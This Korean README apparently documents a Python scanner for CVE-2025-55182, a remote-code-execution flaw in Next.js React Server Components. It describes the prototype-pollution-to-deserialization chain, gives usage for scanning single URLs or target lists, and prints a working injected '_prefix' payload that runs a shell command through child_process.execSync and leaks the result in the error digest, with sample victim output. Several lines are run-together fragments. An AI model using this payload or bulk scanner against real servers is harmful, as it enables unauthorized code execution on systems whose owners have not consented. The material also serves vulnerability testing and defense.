
CVE-2025-55182를 위한 보안 스캐너 - React Server Components의 심각한 RCE 취약점
이 도구는 대상이 CVE‑2025‑55182에 취약한지 확인합니다. 이 버그는 Next.js 내에서 RSC(React Server Components) 모델 페이로드를 안전하지 않게 처리하여 발생하는 원격 코드 실행(RCE) 버그입니다.
취약점 체인은 프로토타입 오염(Prototype Pollution) → 역직렬화 남용(Deserialization Abuse) → 서버 측 JavaScript 실행(Server‑Side JavaScript Execution) 입니다.
면책 조항: 법적으로 소유하거나 명시적 권한이 있는 시스템에서만 사용하십시오. 무단 테스트 = 범죄입니다, 브로.
Next.js는 내부적으로 multipart/form-data를 통해 전송된 특수 "model" 객체를 처리합니다.
공격자가 위조된 thenable과 같은 악성 구조를 주입하면, 다음을 오염시킬 수 있습니다:
__proto___response._prefixconstructor.constructor이로 인해 서버가 공격자가 제어하는 JavaScript를 실행하게 되어 완전한 RCE가 발생합니다.
-u) 또는 대상 목록 (-l)을 입력받습니다id)을 추출합니다foxvuln.txt에 저장합니다python3 main.py -u https://target.com
python3 main.py -l list.txt
페이로드는 주입된 _prefix를 통해 process.mainModule.require('child_process').execSync()를 악용합니다:
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
이로 인해 서버가 id를 실행하고, 발생된 다이제스트 내에 결과를 노출시킵니다 (RSC 오류는 의도적으로 구조화된 "digest" 필드를 반환하기 때문입니다).
취약한 대상:
[+] Testing: https://victim.com
[VULN] user : uid=1000(www-data)
취약하지 않은 경우:
[+] Testing: https://secure.com
[NOT VULN]
확인된 모든 취약한 URL은 다음에 저장됩니다:
foxvuln.txt
형식:
https://victim.com => uid=1000(www-data)
/에서 POST를 처리한다고 가정합니다